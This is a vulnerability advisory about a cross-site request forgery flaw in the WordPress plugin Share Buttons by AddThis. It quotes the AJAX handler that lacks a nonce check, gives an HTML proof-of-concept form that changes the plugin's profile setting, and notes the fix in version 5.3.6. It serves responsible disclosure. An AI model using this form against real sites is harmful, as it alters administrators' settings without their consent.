We recently found that the plugin Share Buttons by AddThis had a cross-site request forgery (CSRF)/settings change vulnerability. When setting the plugin’s settings by clicking the Save Options button on the plugin’s settings page proper protection against CSRF exist, but it doesn’t for an alternate method when the plugin is set be controlled from “AddThis.com”.

When it is controlled that way the addthisAsyncLoading function is accessible through WordPress’ AJAX functionality (in the file /addthis-for-wordpress.php):

64

add_action( 'wp_ajax_at_async_loading', array($this, 'addthisAsyncLoading'));

That function checks to make sure the request is coming from some with “manage_options” capability (which is normally only Administrators), but doesn’t check for a valid nonce to prevent CSRF before updating the plugin’s settings:

612
613
614
615

public function addthisAsyncLoading()
{
	if (current_user_can( 'manage_options' ) && $this->_checkAsyncLoading()) {
		$updateResult = $this->updateSettings($this->_postVariables);

After we notified the developer of the issue they resolved it in version 5.3.6 by removing the code shown above from the plugin.

Proof of Concept

The following proof of concept will cause the AddThis Profile ID setting to be changed to “test”, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="at_async_loading" />
<input type="hidden" name="async_loading" />
<input type="hidden" name="addthis_settings[addthis_profile]" value='test' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

• June 26, 2017 – Developer notified.
• June 26, 2017 – Developer responds.
• July 13, 2017 – Version 5.3.6 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?